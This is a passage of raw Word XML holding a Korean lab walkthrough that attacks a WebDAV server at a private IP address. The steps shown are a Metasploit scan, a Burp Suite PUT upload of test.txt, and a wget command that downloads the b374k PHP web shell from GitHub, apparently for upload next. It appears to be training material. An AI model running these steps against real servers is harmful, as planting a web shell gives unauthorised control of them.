      </w:r>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>etasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">webDAV </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>스캐닝 실시</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70264E95" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1586"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t># msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A18F10" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1586"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> set rhost 192.168.0.146</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F9FFB3" w14:textId="77777777" w:rsidR="007C6147" w:rsidRPr="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1586"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D35A47" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="786"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40753441" wp14:editId="36FADEF2">
            <wp:extent cx="5760000" cy="1517356"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="260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17356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C3B5757" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>WebDAV 클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92A6FB" w14:textId="77777777" w:rsidR="007C6147" w:rsidRPr="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WebDAV 클릭 또는 ‘http://192.168.0.146/webdav’ 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CC720" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="00194478" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="78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0185FC" wp14:editId="397D1E2A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2904485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>559435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="574263" cy="169414"/>
                <wp:effectExtent l="19050" t="19050" r="16510" b="21590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63" cy="1694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6D5D0" id="직사각형 44" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:228.7pt;margin-top:44.05pt;width:45.2pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007C6147" w:rsidRPr="007C6147">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3611AB36" wp14:editId="0290F867">
            <wp:extent cx="5760000" cy="1202055"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="17145"/>
            <wp:docPr id="2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3A79EF1-F55F-4F9D-9284-F5B89D07A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3A79EF1-F55F-4F9D-9284-F5B89D07AE00}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02055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0FC53B" w14:textId="77777777" w:rsidR="007C6147" w:rsidRPr="000E54A6" w:rsidRDefault="007C6147" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/webdav 안에 있는 파일을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E4185" w14:textId="77777777" w:rsidR="00A60087" w:rsidRDefault="008112DB" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:firstLine="78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30FAC9" wp14:editId="373775A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1507485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>300355</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1425842" cy="169414"/>
                <wp:effectExtent l="19050" t="19050" r="22225" b="21590"/>
                <wp:wrapNone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842" cy="1694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9BF19" id="직사각형 66" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:118.7pt;margin-top:23.65pt;width:112.25pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000E54A6">
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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E44E297" wp14:editId="761316FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>111212</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10334320"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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033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261D7" id="직사각형 25" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:8.75pt;margin-top:0;width:533.25pt;height:813.7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  <w:r w:rsidR="000E54A6" w:rsidRPr="000E54A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A23A3A1" wp14:editId="65CB04C4">
            <wp:extent cx="5760000" cy="2221230"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2667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3129943A-9D20-4E8B-B00D-A739B63429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3129943A-9D20-4E8B-B00D-A739B63429DE}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21230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CF48A64" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:ind w:firstLine="786"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6E20ED" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="00D3530D" w:rsidP="00D3530D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Brup Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>사용</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F21504" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRPr="00D3530D" w:rsidRDefault="00D3530D" w:rsidP="00D3530D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D3530D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> [proxy] -&gt; [Intercept] -&gt; [Intercept is on]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해준 후,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>다시 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D0A1B" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="00194478" w:rsidP="00D3530D">
      <w:pPr>
        <w:ind w:firstLine="8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169A36" wp14:editId="696E09B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1843758</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>802097</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="574263" cy="169414"/>
                <wp:effectExtent l="19050" t="19050" r="16510" b="2159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63" cy="1694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A3E62" id="직사각형 47" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:145.2pt;margin-top:63.15pt;width:45.2pt;height:13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1008EB" wp14:editId="0DF89CF2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>608873</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>469057</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="413720" cy="146083"/>
                <wp:effectExtent l="19050" t="19050" r="24765" b="2540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20" cy="1460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BE4AD" id="직사각형 46" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:47.95pt;margin-top:36.95pt;width:32.6pt;height:11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8E27EA" wp14:editId="7AE20893">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1340480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>292100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="315998" cy="148474"/>
                <wp:effectExtent l="19050" t="19050" r="27305" b="2349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98" cy="1484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7C434" id="직사각형 45" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:105.55pt;margin-top:23pt;width:24.9pt;height:11.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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D3530D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2DB6AF" wp14:editId="0BA14AB3">
            <wp:extent cx="5760000" cy="2227207"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="209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1004"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2227207"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9522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96482" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRPr="00D3530D" w:rsidRDefault="00D3530D" w:rsidP="00D3530D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12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 xml:space="preserve">UT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">메소드 변경 및 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">에 내용 추가 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3199A2" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="00194478" w:rsidP="00D3530D">
      <w:pPr>
        <w:ind w:left="80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F591F3" wp14:editId="10B966B7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>559435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2299340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1153160" cy="132124"/>
                <wp:effectExtent l="19050" t="19050" r="27940" b="20320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1321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99310" id="직사각형 49" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:44.05pt;margin-top:181.05pt;width:90.8pt;height:10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07CF60" wp14:editId="1F0C41CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>560012</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1397630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1258318" cy="162434"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="28575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318" cy="1624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9E14E" id="직사각형 48" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:44.1pt;margin-top:110.05pt;width:99.1pt;height:12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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D3530D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33AD51CB" wp14:editId="1CA1AB49">
            <wp:extent cx="5760000" cy="2501128"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="139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4308"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2501128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9522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FE02" w14:textId="77777777" w:rsidR="00E10849" w:rsidRDefault="00E10849" w:rsidP="00D3530D">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDF9D7D" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="00A60087" w:rsidP="00D3530D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일 업로드 및 결과 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A9A2BF" w14:textId="7FFE5934" w:rsidR="00A60087" w:rsidRDefault="00A60087" w:rsidP="00A60087">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3530D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ntercept is o</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3530D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ff]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB11680" w14:textId="60808398" w:rsidR="00416593" w:rsidRDefault="00416593" w:rsidP="00A60087">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>메서드 파일 생성</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5472A" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="000E54A6" w:rsidP="00D3530D">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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D6B02B" wp14:editId="28431E28">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>150073</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:align>bottom</wp:align>
                </wp:positionV>
                <wp:extent cx="6772275" cy="9953698"/>
                <wp:effectExtent l="0" t="0" r="9525" b="952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953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3B865" id="직사각형 26" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:11.8pt;margin-top:0;width:533.25pt;height:783.7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  <w:r w:rsidR="00D3530D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00581010" wp14:editId="36342588">
            <wp:extent cx="5760000" cy="1177206"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2349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77206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17DE91" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="00D3530D" w:rsidP="00D3530D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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다시 접속해보면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">‘test.txt’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>파일 업로드</w:t>
      </w:r>
      <w:r w:rsidR="00A60087">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 된 것을 확인 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC21F04" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="00194478" w:rsidP="00A60087">
      <w:pPr>
        <w:ind w:left="80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DC5196" wp14:editId="3DBAA56A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>566992</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1904977</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2214599" cy="176394"/>
                <wp:effectExtent l="19050" t="19050" r="14605" b="14605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599" cy="176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A9003" id="직사각형 50" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:44.65pt;margin-top:150pt;width:174.4pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D3530D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50FBEC1C" wp14:editId="377F3603">
            <wp:extent cx="5760000" cy="2260852"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2540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60852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2CBB16" w14:textId="77777777" w:rsidR="00A60087" w:rsidRDefault="00A60087" w:rsidP="00A60087">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">est.txt’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">파일을 클릭해보면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">메소드로 전송된 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>내용을 확인 할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17123248" w14:textId="77777777" w:rsidR="00A60087" w:rsidRDefault="008112DB" w:rsidP="00A60087">
      <w:pPr>
        <w:ind w:left="80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FF3B76" wp14:editId="4C3816DD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>531495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>481960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825549" cy="176394"/>
                <wp:effectExtent l="19050" t="19050" r="12700" b="14605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49" cy="176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83DF6" id="직사각형 51" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:41.85pt;margin-top:37.95pt;width:65pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A60087">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4965DF5A" wp14:editId="5029CF27">
            <wp:extent cx="5760000" cy="735272"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="273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35272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65E3B0" w14:textId="7D8A309A" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00A60087">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39777A08" w14:textId="77777777" w:rsidR="00EF1860" w:rsidRDefault="00EF1860" w:rsidP="00A60087">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301FAE3A" w14:textId="77777777" w:rsidR="00A60087" w:rsidRPr="00A60087" w:rsidRDefault="00A60087" w:rsidP="00A60087">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6BB824" w14:textId="77777777" w:rsidR="00A60087" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">‘b374k’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>웹 셀 다운로드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21842B73" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12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구글에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">‘bk374k’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">검색하여 웹 쉘 다운로드 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393FB2D7" w14:textId="210BC129" w:rsidR="008868CF" w:rsidRPr="008868CF" w:rsidRDefault="008868CF" w:rsidP="008868CF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>환경에서 사용할 수 있는 웹 쉘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6683A39B" w14:textId="77777777" w:rsidR="000E54A6" w:rsidRDefault="000E54A6" w:rsidP="000E54A6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1586"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="009D14B5">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:b/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/tennc/webshell/master/php/b374k/b374k-3.2.2.php</w:t>
